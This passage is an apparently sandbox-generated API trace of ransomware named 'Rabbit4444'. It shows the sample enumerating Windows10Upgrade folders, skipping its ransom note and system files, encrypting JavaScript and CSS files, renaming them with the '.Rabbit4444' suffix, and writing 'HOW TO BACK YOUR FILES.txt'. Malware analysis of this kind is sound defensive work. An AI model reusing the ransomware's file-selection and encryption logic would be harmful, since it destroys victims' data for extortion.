FlushFileBuffers (hFile=0x27c) returned 1 [0046.509] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\js\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0046.509] CloseHandle (hObject=0x27c) returned 1 [0046.510] lstrlenW (lpString="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\js") returned 51 [0046.510] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0046.510] FindFirstFileW (in: lpFileName="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\js\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea6143a6, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea61ff59, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe50af732, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0046.510] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.510] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0046.510] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0046.510] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0046.510] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea6143a6, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea61ff59, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe50af732, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.510] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.510] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0046.510] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0046.510] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0046.510] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0046.510] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe50af732, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe50af732, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe50af732, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0046.510] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.510] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0046.510] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea61ff59, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea61ff59, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x1395c6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="base.js", cAlternateFileName="")) returned 1 [0046.510] lstrcmpiW (lpString1="base.js", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.510] lstrcmpiW (lpString1="base.js", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.510] lstrcmpiW (lpString1="base.js", lpString2="Rabbit4444.exe") returned -1 [0046.510] lstrcmpiW (lpString1="base.js", lpString2=".") returned 1 [0046.511] lstrcmpiW (lpString1="base.js", lpString2="..") returned 1 [0046.511] lstrcmpiW (lpString1="base.js", lpString2="windows") returned -1 [0046.511] lstrcmpiW (lpString1="base.js", lpString2="bootmgr") returned -1 [0046.511] lstrcmpiW (lpString1="base.js", lpString2="pagefile.sys") returned -1 [0046.511] lstrcmpiW (lpString1="base.js", lpString2="boot") returned -1 [0046.511] lstrcmpiW (lpString1="base.js", lpString2="ids.txt") returned -1 [0046.511] lstrcmpiW (lpString1="base.js", lpString2="NTUSER.DAT") returned -1 [0046.511] lstrcpyW (in: lpString1=0x130eba0, lpString2="base.js" | out: lpString1="base.js") returned="base.js" [0046.511] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\js\\base.js", dwFileAttributes=0x0) returned 1 [0046.511] lstrlenW (lpString="base.js") returned 7 [0046.511] lstrlenW (lpString="Rabbit4444") returned 10 [0046.511] lstrcmpiW (lpString1="ꀀ", lpString2="Rabbit4444") returned 1 [0046.511] lstrlenW (lpString=".dll") returned 4 [0046.511] lstrcmpiW (lpString1="e.js", lpString2=".dll") returned 1 [0046.511] lstrlenW (lpString=".lnk") returned 4 [0046.511] lstrcmpiW (lpString1="e.js", lpString2=".lnk") returned 1 [0046.511] lstrlenW (lpString=".ini") returned 4 [0046.511] lstrcmpiW (lpString1="e.js", lpString2=".ini") returned 1 [0046.511] lstrlenW (lpString=".sys") returned 4 [0046.511] lstrcmpiW (lpString1="e.js", lpString2=".sys") returned 1 [0046.512] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\js\\base.js" (normalized: "c:\\windows10upgrade\\resources\\ux\\microsoft.winjs\\js\\base.js"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0046.512] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0046.512] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13782243403) returned 1 [0046.512] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1283526) returned 1 [0046.512] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117d10 [0046.512] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101b78 [0046.512] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1398d0, lpName=0x0) returned 0x298 [0046.513] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1398d0) returned 0x2c20000 [0046.542] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0046.542] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0046.542] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0046.543] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0046.543] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0046.543] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0046.543] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0046.543] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0046.543] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13785366143) returned 1 [0046.543] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117d10 | out: hHeap=0xe0000) returned 1 [0046.543] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101b78 | out: hHeap=0xe0000) returned 1 [0046.543] UnmapViewOfFile (lpBaseAddress=0x2c20000) returned 1 [0046.609] CloseHandle (hObject=0x298) returned 1 [0046.609] CloseHandle (hObject=0x278) returned 1 [0046.678] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\js\\base.js.Rabbit4444") returned 70 [0046.679] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\js\\base.js" (normalized: "c:\\windows10upgrade\\resources\\ux\\microsoft.winjs\\js\\base.js"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\js\\base.js.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\microsoft.winjs\\js\\base.js.rabbit4444"), dwFlags=0x1) returned 1 [0046.680] InterlockedExchangeAdd (in: Addend=0xff618, Value=1283536 | out: Addend=0xff618) returned 4918432 [0046.680] InterlockedExchangeAdd (in: Addend=0xff624, Value=31 | out: Addend=0xff624) returned 2660 [0046.680] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea61ff59, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea61ff59, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x2e7dba, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ui.js", cAlternateFileName="")) returned 1 [0046.680] lstrcmpiW (lpString1="ui.js", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0046.680] lstrcmpiW (lpString1="ui.js", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.680] lstrcmpiW (lpString1="ui.js", lpString2="Rabbit4444.exe") returned 1 [0046.680] lstrcmpiW (lpString1="ui.js", lpString2=".") returned 1 [0046.680] lstrcmpiW (lpString1="ui.js", lpString2="..") returned 1 [0046.680] lstrcmpiW (lpString1="ui.js", lpString2="windows") returned -1 [0046.680] lstrcmpiW (lpString1="ui.js", lpString2="bootmgr") returned 1 [0046.680] lstrcmpiW (lpString1="ui.js", lpString2="pagefile.sys") returned 1 [0046.680] lstrcmpiW (lpString1="ui.js", lpString2="boot") returned 1 [0046.680] lstrcmpiW (lpString1="ui.js", lpString2="ids.txt") returned 1 [0046.680] lstrcmpiW (lpString1="ui.js", lpString2="NTUSER.DAT") returned 1 [0046.680] lstrcpyW (in: lpString1=0x130eba0, lpString2="ui.js" | out: lpString1="ui.js") returned="ui.js" [0046.680] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\js\\ui.js", dwFileAttributes=0x0) returned 1 [0046.680] lstrlenW (lpString="ui.js") returned 5 [0046.680] lstrlenW (lpString="Rabbit4444") returned 10 [0046.680] lstrcmpiW (lpString1=".\x03ꀀ", lpString2="Rabbit4444") returned -1 [0046.680] lstrlenW (lpString=".dll") returned 4 [0046.680] lstrcmpiW (lpString1="i.js", lpString2=".dll") returned 1 [0046.681] lstrlenW (lpString=".lnk") returned 4 [0046.681] lstrcmpiW (lpString1="i.js", lpString2=".lnk") returned 1 [0046.681] lstrlenW (lpString=".ini") returned 4 [0046.681] lstrcmpiW (lpString1="i.js", lpString2=".ini") returned 1 [0046.681] lstrlenW (lpString=".sys") returned 4 [0046.681] lstrcmpiW (lpString1="i.js", lpString2=".sys") returned 1 [0046.681] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\js\\ui.js" (normalized: "c:\\windows10upgrade\\resources\\ux\\microsoft.winjs\\js\\ui.js"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0046.681] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0046.681] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13799158739) returned 1 [0046.681] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=3046842) returned 1 [0046.681] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117d10 [0046.681] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0046.681] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2e80c0, lpName=0x0) returned 0x298 [0046.682] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x200000, dwNumberOfBytesToMap=0xe80c0) returned 0x2c20000 [0046.704] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x200000) returned 0x2d10000 [0046.811] UnmapViewOfFile (lpBaseAddress=0x2d10000) returned 1 [0047.000] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0047.000] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0047.000] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0047.000] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0047.000] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0047.001] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0047.001] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0047.001] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0047.001] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13831153589) returned 1 [0047.001] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117d10 | out: hHeap=0xe0000) returned 1 [0047.001] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0047.001] UnmapViewOfFile (lpBaseAddress=0x2c20000) returned 1 [0047.009] CloseHandle (hObject=0x298) returned 1 [0047.009] CloseHandle (hObject=0x278) returned 1 [0047.133] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\js\\ui.js.Rabbit4444") returned 68 [0047.134] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\js\\ui.js" (normalized: "c:\\windows10upgrade\\resources\\ux\\microsoft.winjs\\js\\ui.js"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\js\\ui.js.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\microsoft.winjs\\js\\ui.js.rabbit4444"), dwFlags=0x1) returned 1 [0047.135] InterlockedExchangeAdd (in: Addend=0xff618, Value=3046848 | out: Addend=0xff618) returned 6201968 [0047.135] InterlockedExchangeAdd (in: Addend=0xff624, Value=319 | out: Addend=0xff624) returned 2691 [0047.135] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea61ff59, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea61ff59, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x2e7dba, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ui.js", cAlternateFileName="")) returned 0 [0047.135] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0047.135] lstrcpyW (in: lpString1=0x130eba0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0047.135] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\js\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\windows10upgrade\\resources\\ux\\microsoft.winjs\\js\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0047.137] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0047.137] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0047.137] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0047.137] CloseHandle (hObject=0x278) returned 1 [0047.137] CloseHandle (hObject=0x27c) returned 1 [0047.138] GetCurrentThreadId () returned 0xd98 [0047.138] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6530 [0047.138] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\css", iMaxLength=2048 | out: lpString1="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\css") returned="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\css" [0047.138] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0047.138] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6528 | out: hHeap=0xe0000) returned 1 [0047.138] lstrcatW (in: lpString1="", lpString2="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\css" | out: lpString1="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\css") returned="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\css" [0047.138] lstrcatW (in: lpString1="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\css", lpString2="\\" | out: lpString1="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\css\\") returned="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\css\\" [0047.138] lstrcatW (in: lpString1="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\css\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\css\\.BFC0E91B00AE8A0620D3") returned="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\css\\.BFC0E91B00AE8A0620D3" [0047.138] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\css\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\windows10upgrade\\resources\\ux\\microsoft.winjs\\css\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0047.140] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0047.142] FlushFileBuffers (hFile=0x27c) returned 1 [0047.143] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\css\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0047.144] CloseHandle (hObject=0x27c) returned 1 [0047.144] lstrlenW (lpString="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\css") returned 52 [0047.144] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0047.144] FindFirstFileW (in: lpFileName="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\css\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea60a72c, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea6143a6, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe56cb726, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102b10 [0047.144] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.144] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0047.145] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0047.145] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0047.145] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea60a72c, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea6143a6, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe56cb726, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.145] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.145] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0047.145] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0047.145] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0047.145] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0047.145] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe56cb726, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe56cb726, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe56cb726, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0047.145] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.145] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0047.145] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea60a72c, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea60a72c, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x9ff9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="oobe-desktop.css", cAlternateFileName="OOBE-D~1.CSS")) returned 1 [0047.145] lstrcmpiW (lpString1="oobe-desktop.css", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0047.145] lstrcmpiW (lpString1="oobe-desktop.css", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.145] lstrcmpiW (lpString1="oobe-desktop.css", lpString2="Rabbit4444.exe") returned -1 [0047.145] lstrcmpiW (lpString1="oobe-desktop.css", lpString2=".") returned 1 [0047.145] lstrcmpiW (lpString1="oobe-desktop.css", lpString2="..") returned 1 [0047.145] lstrcmpiW (lpString1="oobe-desktop.css", lpString2="windows") returned -1 [0047.145] lstrcmpiW (lpString1="oobe-desktop.css", lpString2="bootmgr") returned 1 [0047.145] lstrcmpiW (lpString1="oobe-desktop.css", lpString2="pagefile.sys") returned -1 [0047.145] lstrcmpiW (lpString1="oobe-desktop.css", lpString2="boot") returned 1 [0047.145] lstrcmpiW (lpString1="oobe-desktop.css", lpString2="ids.txt") returned 1 [0047.145] lstrcmpiW (lpString1="oobe-desktop.css", lpString2="NTUSER.DAT") returned 1 [0047.145] lstrcpyW (in: lpString1=0x130eba2, lpString2="oobe-desktop.css" | out: lpString1="oobe-desktop.css") returned="oobe-desktop.css" [0047.145] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\css\\oobe-desktop.css", dwFileAttributes=0x0) returned 1 [0047.146] lstrlenW (lpString="oobe-desktop.css") returned 16 [0047.146] lstrlenW (lpString="Rabbit4444") returned 10 [0047.146] lstrcmpiW (lpString1="esktop.css", lpString2="Rabbit4444") returned -1 [0047.146] lstrlenW (lpString=".dll") returned 4 [0047.146] lstrcmpiW (lpString1=".css", lpString2=".dll") returned -1 [0047.146] lstrlenW (lpString=".lnk") returned 4 [0047.146] lstrcmpiW (lpString1=".css", lpString2=".lnk") returned -1 [0047.146] lstrlenW (lpString=".ini") returned 4 [0047.146] lstrcmpiW (lpString1=".css", lpString2=".ini") returned -1 [0047.146] lstrlenW (lpString=".sys") returned 4 [0047.146] lstrcmpiW (lpString1=".css", lpString2=".sys") returned -1 [0047.146] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\css\\oobe-desktop.css" (normalized: "c:\\windows10upgrade\\resources\\ux\\microsoft.winjs\\css\\oobe-desktop.css"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0047.146] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0047.146] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13845679095) returned 1 [0047.146] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=40953) returned 1 [0047.146] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1177e8 [0047.146] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0047.146] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xa300, lpName=0x0) returned 0x298 [0047.147] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa300) returned 0x70000 [0047.150] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0047.150] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0047.150] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0047.150] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0047.150] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0047.151] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0047.151] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0047.151] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0047.151] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13846137315) returned 1 [0047.151] HeapFree (in: 